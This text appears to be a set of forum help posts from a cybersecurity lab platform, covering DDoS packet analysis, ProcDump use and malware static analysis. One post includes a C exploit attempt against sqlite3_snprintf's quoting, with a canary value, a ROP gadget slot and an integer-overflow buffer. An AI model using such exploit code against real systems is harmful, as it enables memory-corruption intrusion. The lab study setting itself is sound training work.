DDOS Analysis: UDP Flood (Question 8)
I'm working through the DDoS UDP Analysis lab and am currently stuck on question 8. I've used both the Statistics > Summary tool within Wireshark and also capinfos to try to determine the total length of the DDoS attack. However the time difference I'm coming up with through both methods is not the correct answer. Any suggestions?
Linux Stack Overflow Ep.6
I am having trouble figuring how this lab. I got the other questions, but can't get the token. This is the code I am running, but it just causing a segmentation fault. #include <assert.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <sqlite3.h> #define RETADDR_OFFSET 0 #define CANARY_OFFSET 0x40 #define BUF_OFFSET 0x88 #define CANARY 0xbaadd00dbaadd00dull #define ROPGADGET 0xdeadbeefdeadbeefull #define NGADGETS 1 struct payload { uint8_t padding1[BUF_OFFSET-CANARY_OFFSET]; uint64_t canary; uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8]; uint64_t ropchain[NGADGETS]; }__attribute__((packed, aligned(1))); int main(int argc, char *argv[]) { char dst[256]; struct payload p; memset(p.padding1, 'a', sizeof(p.padding1)); p.canary = CANARY; memset(p.padding2, 'b', sizeof(p.padding2)); p.ropchain[0] = ROPGADGET; size_t target_n = 0x80000000; assert(sizeof(p) + 3 <= target_n); size_t n = target_n - sizeof(p) - 3; size_t target_i = 0x100000000 + (sizeof(p) / 2); char *src = calloc(1, target_i); if (!src) { printf("bad allocation\n"); return -1; } size_t cur = 0; memcpy(src, &p, sizeof(p)); cur += sizeof(p); memset(src+cur, '\'', n/2); cur += n/2; assert(cur < 0x7ffffffeul); memset(src+cur, 'c', 0x7ffffffeul-cur); cur += 0x7ffffffeul-cur; src[cur] = '\xc0'; cur++; memset(src+cur, '\x80', target_i - cur); cur = target_i; src[cur-1] = '\0'; sqlite3_snprintf((int) 256, dst, "'%!q'", src); free(src); return 0; }
Windows Sysinternals: ProcDump
What exception is reported by ProcDump when monitoring the execution of ExceptionCatcher.exe? I´ve started "cmd" as administrator but I get the following message. No clue how to launch procdump and how to see the exception. I´ve tried with: procdump.exe -e 1 c:\Users\IMLUser\Desktop\ExceptionCatcher.exe exception.dmp procdump.exe -ma c:\Users\IMLUser\Desktop\ExceptionCatcher.exe exception.dmp Thanks in advance
Practical Malware Analysis: Static Analysis question 19
for what native Microsoft service is this malware trying to masquerade as with a legitimate seeming name and a reference to a file path that can be used for persistence, for some reason when typing down the Microsoft Security Center (2.0) Service name, and the info gained from and the registry path HKCU\Software\Microsoft\Windows\CurrentVersion\Run\. it keeps saying that it is wrong. I am wondering about what format are they expecting an answer? or if I am using the wrong name. as mssecsvc2.0 is also wrong.Practical Malware Analysis: Static Analysis question 18
for finding the exact name of the executable file. After dynamically overriding the function as shown in the briefing I cant seem to find any meaningful creation of the filename matching the patter provided in sprintf. I am wondering if I should be overriding a different function? as I cant seem to find any meaningful leads when searching for references or traveling to the next data. I also cant seem to find any leads from searching specifically for local_104 and unaff_EDI references as well.
